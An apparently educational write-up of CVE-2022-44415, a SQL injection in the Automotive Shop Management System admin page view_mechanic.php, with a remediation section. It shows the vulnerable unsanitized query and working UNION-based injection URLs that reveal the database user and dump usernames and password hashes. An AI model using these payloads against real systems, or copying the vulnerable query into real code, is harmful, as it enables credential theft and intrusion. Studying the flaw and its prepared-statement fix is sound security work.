CVE-2022-44415 - SQL Injection in Automotive Shop Management System v1. (Full Analysis & Exploit Demo)

Automotive Shop Management System (ASMS) v1. is a popular open-source solution for managing automotive service shops. Unfortunately, a severe SQL Injection vulnerability (CVE-2022-44415) was discovered in its administrative backend. This vulnerability allows attackers to manipulate database queries and potentially take full control of the system.

In this exclusive deep-dive, we’ll explain what CVE-2022-44415 is, demonstrate how it works, and show how an attacker might exploit it—all in straightforward, easy-to-understand language.

Vulnerability Type: SQL Injection

- Affected URL: /asms/admin/mechanics/view_mechanic.php?id=
- Affected Version: Automotive Shop Management System v1. (possibly earlier/later)

Access Required: Admin login (but could combine with other exploits for wider impact)

SQL Injection is when an attacker tricks a website’s database by inserting malicious SQL code through form inputs or URL parameters. With this bug, a user can alter database queries by manipulating the id parameter in the admin backend.

Here’s a stripped-down version of the problem code inside view_mechanic.php

<?php
// ... authentication code ...
include '../../db_connect.php';

if (isset($_GET['id'])) {
    $id = $_GET['id'];
    // VULNERABLE: No input sanitization here!
    $qry = $conn->query("SELECT * FROM mechanics where id = $id");
    $mechanic = $qry->fetch_assoc();
    // ... rest of the page ...
}
?>

The key problem:  
The variable $id is taken directly from the user’s input and used in an SQL query without validation or escaping.

Suppose an attacker accesses this URL as an admin

https://example.com/asms/admin/mechanics/view_mechanic.php?id=1

They could instead try

https://example.com/asms/admin/mechanics/view_mechanic.php?id=1 OR 1=1

Which produces the following SQL

SELECT * FROM mechanics where id = 1 OR 1=1

This returns all rows in the mechanics table, not just the one with id=1.

Extracting Data

You can use an error-based payload to pull out sensitive information, for example, the current database user:

https://example.com/asms/admin/mechanics/view_mechanic.php?id=1 UNION SELECT 1,user(),3,4,5,6,7,8,9,10--

If the columns align, it’ll show the database user info directly on the page.

If the schema is common, you can dump all usernames and hashed passwords

https://example.com/asms/admin/mechanics/view_mechanic.php?id=1 UNION SELECT 1,username,password,4,5,6,7,8,9,10 FROM users--

Replace users and column numbers as needed for this actual schema.

Reference Links

- CVE-2022-44415 at NVD
- Exploit-DB #51354
- YouTube Video POC
- Official ASMS Download Page (for testing)

How to Fix

Never put user input directly into SQL!

Always use prepared statements

$id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM mechanics WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
$mechanic = $stmt->get_result()->fetch_assoc();

Alternatively, verify the input is numeric

$id = intval($_GET['id']);

All user inputs MUST be filtered or, better yet, bound using database-safe methods!

- Anyone running ASMS v1. should patch this immediately or update to a fixed version if/when available.

For further reading, see the references above!

Stay safe—never trust user input, not even in your admin backend.


*Authored for automatic systems and security learners, 2024.*

Timeline

Published on: 11/18/2022 19:15:00 UTC
Last modified on: 11/20/2022 07:57:00 UTC